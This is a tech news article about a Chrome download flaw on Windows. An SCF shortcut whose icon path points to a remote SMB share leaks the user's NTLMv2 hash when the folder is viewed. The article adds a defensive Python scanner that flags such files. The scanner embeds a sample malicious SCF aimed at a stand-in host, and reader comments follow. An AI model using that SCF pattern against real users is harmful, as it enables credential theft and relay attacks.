Google working to fix Chrome flaw that could allow credential theft on Windows

A new flaw has been discovered in Google Chrome which could allow malicious actors to steal credentials on Windows PCs.

Discovered by DefenseCode security researcher Bosko Stankovic (via ZDNet), the flaw works through a clever trick in the way Chrome and Windows both treat Windows Explorer Shell Command File (SCF) files, which Windows uses for shortcuts such as the Show Desktop icon. The end result is that the SCF file can be used to obtain a user's LAN Manager (NTLMv2) password hash.

Stankovic writes:

Once downloaded, the request is triggered the very moment the download directory is opened in Windows File Explorer to view the file, delete it or work with other files (which is pretty much inevitable). There is no need to click or open the downloaded file – Windows File Explorer will automatically try to retrieve the "icon". The remote SMB server set up by the attacker is ready to capture the victim's username and NTLMv2 password hash for offline cracking or relay the connection to an externally available service that accepts the same kind of authentication (e.g. Microsoft Exchange) to impersonate the victim without ever knowing the password.

Speaking with Kaspersky's ThreatPost, Google noted that it is "aware of this and taking the necessary actions."

If you rely on Google Chrome for browsing the web, you can protect yourself by heading to Settings > Show advanced settings and checking the box next to "Ask where to save each file before downloading" under the "Downloads" section. Given that this appears to work on all versions of Windows, even Windows 10, hopefully we see a resolution from Google soon.
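The browser setting above only controls where the file lands; what actually triggers the SMB request is an SCF file whose icon path points at a remote share, which Explorer dereferences as soon as the folder is rendered. The following is an added example, not code from the article or from DefenseCode, of a host-side check an administrator could run over a downloads folder: it parses the INI-like SCF format, reports any file whose `IconFile` is a UNC path, and names the host it would connect to. The file names and the 192.0.2.10 address are constructed sample data, and the `parse_scf`, `remote_icon_host`, `scan_folder` and `demo` names are the example's own.

```python
# Added example (not from the article or from DefenseCode): a host-side check that
# parses SCF shortcut files and flags any whose icon lives on a remote UNC share,
# which is what makes Explorer open an outbound SMB connection on folder view.
# File names and the 192.0.2.10 host below are constructed sample data.
import configparser
import re
import tempfile
from pathlib import Path

# Leading \\host\ or //host/ : the icon would be fetched over the network.
UNC_RE = re.compile(r"^(?:\\\\|//)([^\\/]+)[\\/]")

# Constructed samples. The first is the shape of a genuine Show Desktop
# shortcut; the second points its icon at a share on a TEST-NET address.
BENIGN_SCF = (
    "[Shell]\n"
    "Command=2\n"
    "IconFile=explorer.exe,3\n"
    "[Taskbar]\n"
    "Command=ToggleDesktop\n"
)
SUSPICIOUS_SCF = (
    "[Shell]\n"
    "Command=2\n"
    "IconFile=\\\\192.0.2.10\\share\\icon.ico\n"
    "[Taskbar]\n"
    "Command=ToggleDesktop\n"
)


def parse_scf(text):
    """Parse the INI-like SCF format into {section_lower: {key_lower: value}}.

    Section and key names are lower-cased because Windows matches them
    case-insensitively; a file that does not parse yields an empty mapping.
    """
    cp = configparser.ConfigParser(interpolation=None, strict=False,
                                   delimiters=("=",))
    try:
        cp.read_string(text)
    except configparser.Error:
        return {}
    return {s.lower(): dict(cp.items(s)) for s in cp.sections()}


def remote_icon_host(text):
    """Return the host named by IconFile if it is a UNC path, else None."""
    icon = parse_scf(text).get("shell", {}).get("iconfile", "").strip()
    m = UNC_RE.match(icon)
    return m.group(1) if m else None


def scan_folder(folder):
    """Return [(path, host)] for every *.scf under folder with a remote icon."""
    findings = []
    for p in Path(folder).rglob("*.scf"):
        try:
            text = p.read_text(encoding="utf-8", errors="replace")
        except OSError:
            continue
        host = remote_icon_host(text)
        if host:
            findings.append((p, host))
    return findings


def demo():
    """Write both samples into a temporary 'Downloads' folder and scan it."""
    with tempfile.TemporaryDirectory() as d:
        Path(d, "show_desktop.scf").write_text(BENIGN_SCF)
        Path(d, "invoice.scf").write_text(SUSPICIOUS_SCF)
        return sorted((p.name, host) for p, host in scan_folder(d))


if __name__ == "__main__":
    for name, host in demo():
        print(f"{name}: icon would be fetched from remote host {host}")
```

Point `scan_folder` at a real Downloads directory to use it outside the demo. The check is deliberately narrow: it only covers `.scf` files and only the `IconFile` key the article's quote describes, so it complements rather than replaces the browser setting. Independently of either, blocking outbound SMB (TCP port 445) at the network boundary prevents a leaked authentication attempt of this kind from reaching an external server at all.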

Dan Thorp-Lancaster is the former Editor-in-Chief of Windows Central. He began working with Windows Central, Android Central, and iMore as a news writer in 2014 and is obsessed with tech of all sorts. You can follow Dan on Twitter @DthorpL and Instagram @heyitsdtl

45 Comments
  • ok...I think that Google must shut up!...and put an end to his campaign against Windows vulnerabilities!
  • Tbh, I don't see how this is hugely Google's fault. I mean, that's like blaming Walmart for selling a kid Clorox wipes that he then squeezes into a glass and drinks. Microsoft AUTO RUNS a command line level script the second you view it in Explorer. That's not the fault of the service that downloads it.
  • It doesn't run anything
  • Well, it kind of does.  It's told to automatically connect to something on the web, from something on the web.  I get why it's useful, but Microsoft should either block ones downloaded from a browser from loading all together, or just ask before attempting to load the shortcut.   It's running something built in to Windows, because some random file from the web told it to.  That is the flaw, not the way the file got there to begin with.
  • Once again UWP is the way to go
  • Ahahahahahahahah No.
  • Remember when MS Antispyware flagged Google Chrome as spyware and removed it? Hahaha they were right then and still right today. It's probably not a vulnerability, but by design, sending all your passwords to your Google overlords...
  • And I guess by that logic WannaCry was actually secretly a MS plant to force people to upgrade their systems. Hey look, I can make stupid statements too.
  • Lol, very ironic considering Windows 10 is doing a whole lot worse than merely mining your passwords: http://youtube.com/watch?v=wPFbAqICUJo
  • That would make sense.  If the issue here was what Google does.  Please explain to me why we're focusing on Google downloading a file, instead of Windows automatically running a random file downloaded from the web.  That is the exploit.  There's a script I can put on anyone's computer, and they automatically run it.  If I were to download this file in Edge, and put it in my downloads folder, it would still run.
  • Make a UWP app for Google Chrome, problem solved. Because it will be in the UWP sandboxed environment.
  • There is one issue with that, I think in order for Google to get a Chrome UWP app published in the store they would need to use Edge to render websites.
  • Yep. It also wouldn't be possible to make it the default browser either.
  • Hey Google we give you 4 weeks for a patch. Otherwise we tell the world. Sound familiar Google. Lol.
  • The world already knows though, obviously.
  • In the comments on a recent story about a vulnerability found in Windows by Google, someone tried to tell me that Google were doing more to keep Windows safe than Microsoft were. If they are, it would appear that it is at the expense of their own software.
  • Well surprise surprise, lol. UWP, and HTML5 compliant and Edge rendering ftw.
  • Maybe Windows Defender should quarantine vulnerable software :)
  • Maybe windows 10 should ban google chrome :) It's dangerous software
  • Right.  Defender shouldn't allow the OS to run random files downloaded from the web without asking the user first.  That is what the vulnerability is, nothing in Chrome.
  • Uninstalled Google Chrome a long time back, when it started giving trouble viewing YouTube using W10 apps. My main browser is Edge and sometimes I use Opera/Firefox. So much for hungry Google collecting every aspect of the user. Thankfully we don't have cameras from Google.
  • Very simple fix: DON'T USE CHROME!
  • 😂 Been using that fix for a long, long time 😂
  • Chrome isn't the real culprit. Chrome puts Clorox wipes on the counter. Microsoft opens them, pours the liquid from the wipes in a cup and drinks it without thinking. Chrome thought Microsoft was an adult and knew not to do that. The fault here is that Microsoft runs files without asking. How is that expected behavior? In theory, I should be able to download a virus laden file, and delete it and not be infected unless I run it. Microsoft runs random files from the web, without asking. That is the issue here.
  • My apologies, it isn't actually running a file, it is a shortcut connecting.  So it is more like causing Windows to run code it already has.  Either way, it shouldn't do that with icons/shortcuts/links from the web without asking first.
  • Just uninstall chrome and use proper browsers. Edge and Opera are quite great.
  • Chrome is for children
  • They, however, are not proper browsers. But of course, coming from you, one wouldn't expect a smart suggestion anyway.
  • None of my devices have google chrome installed. I can't even use google chrome.
    My only browser is Edge.
    When I visit Google on my Lumia 950xl, Google keeps begging me to install Chrome. I laugh at their poor advertisement; they don't know it is a Lumia, and they are yet to develop UWP for Lumia. So even if I wanted to, how can I install it on my Lumia?
    I am very satisfied with the Edge browser.
  • It's not available and very unlikely to become available. There is a *slight* chance that Alphabet may make a UWP app for Windows 10 S, but that will come down to userbase (how attractive it is for Alphabet/Google). However, even if they do make a UWP Chrome there is no guarantee it would be made available on mobile. I think UCBrowser is your only Edge alternative at the current time?
  • Monument browser is the best.
  • That split screen stuff... Awesome.
  • Did the memory leak or CPU usage ever get fixed? That was when I stopped using chrome - when it stopped being the light-weight, standards-compliant, browser it set out to be.
  • WC W10M app is posting comment twice I guess 😆
  • See no one cares
  • Google products are traditionally as hollow as a colander.
  • **** Alphabet, and **** Google. They didn't give us a youtube and Gmaps app and killed our platform. Now we won't let them make a windows 10 s browser and ruin their platform.
  • "Malicious actors"? ...What, like Vinnie Jones?
  • But but but Chrome never has exploits, because open source, because not Edge, because because because.
  • i thought Edge's core is also open-source?
  • No one says Open Source doesn't have exploits.  They say Open Source is harder to have backdoors* since people can vet the code.  This is in no way Chrome's fault.  Microsoft should be easily able to spot icons downloaded from the web, and ask your permission before running them.  That's the real culprit.  If they know an icon initiated from the web, it shouldn't auto-run.
  • I know this is a Windows centered site, but this is way slanted.  Google Chrome simply downloads a file, which yes, should be off by default.  That should be fine really, since just having a bad file on your PC shouldn't hurt until you run it.  Windows automatically runs the file.  That is the problem.  It should say "Are you sure you want to run this script?"  That's the actually terrible part, autodownloading files is just not that great.
  • I hope they fix this soon.